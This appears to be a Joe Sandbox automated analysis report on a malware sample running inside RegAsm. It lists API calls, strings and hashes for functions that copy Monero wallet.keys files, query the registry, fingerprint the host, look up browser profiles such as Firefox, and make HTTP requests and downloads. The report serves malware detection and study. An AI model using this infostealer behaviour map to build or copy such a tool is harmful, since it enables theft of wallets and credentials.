                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                    • memset.MSVCRT ref: 00401E9D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                    • API String ID: 2725398440-218353709
                                                                                    • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                    • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                    • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                    Function 00410071 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                    • wsprintfA.USER32 ref: 00410132
                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                    • String ID: - $%s\%s$?
                                                                                    • API String ID: 404191982-3278919252
                                                                                    • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                    • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                                    • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                    • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                                    Function 0040F689 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                    • memset.MSVCRT ref: 0040F708
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                      • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                    Strings
                                                                                    • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                    • API String ID: 3050127167-1622206642
                                                                                    • Opcode ID: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                                    • Instruction ID: 5386366d5d033f49441d76ecd0ffc2bd1dc3d668faeba3ff857dabf4a36879bb
                                                                                    • Opcode Fuzzy Hash: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                                    • Instruction Fuzzy Hash: 7A517C71900219AEDB20EB94DC81AEEBBB9EF04314F20007EF114B66C1DB795E88CB59
                                                                                    Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004104E2
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • wsprintfA.USER32 ref: 004105AD
                                                                                    • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                      • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                      • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                    • String ID: :\$C
                                                                                    • API String ID: 688099012-3309953409
                                                                                    • Opcode ID: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                    • Instruction ID: 31ba2aefab9431e017bcb41f2bdcd0be11d417c1f72aa959c07d5e8bae5074a4
                                                                                    • Opcode Fuzzy Hash: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                    • Instruction Fuzzy Hash: 8D418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA385A48CBB5
                                                                                    Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3807055897-1526165396
                                                                                    • Opcode ID: 946d6dfafe0dae7fcff12aaf39346c34ab9f805159af0f524c2f5d68d4e4e350
                                                                                    • Instruction ID: 62ef994e2eebf51157d4abcec818fbc8b07954dcba3d20b807130a2a391ecf21
                                                                                    • Opcode Fuzzy Hash: 946d6dfafe0dae7fcff12aaf39346c34ab9f805159af0f524c2f5d68d4e4e350
                                                                                    • Instruction Fuzzy Hash: A341A4B1900258EACB11FFA5D956FDDB7B4AF18708F10017EF90173182DB786B48CA6A
                                                                                    Function 0040ED08 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy
                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                    • API String ID: 2120869262-2697854757
                                                                                    • Opcode ID: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                                    • Instruction ID: 1f3c50db67794596869caf17774f63c9bcd5449133ce98ec0acc847700032956
                                                                                    • Opcode Fuzzy Hash: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                                    • Instruction Fuzzy Hash: 71E19271D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                                    Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2737972104-0
                                                                                    • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                                    • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                                    Function 0041695F Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 654networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416964
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
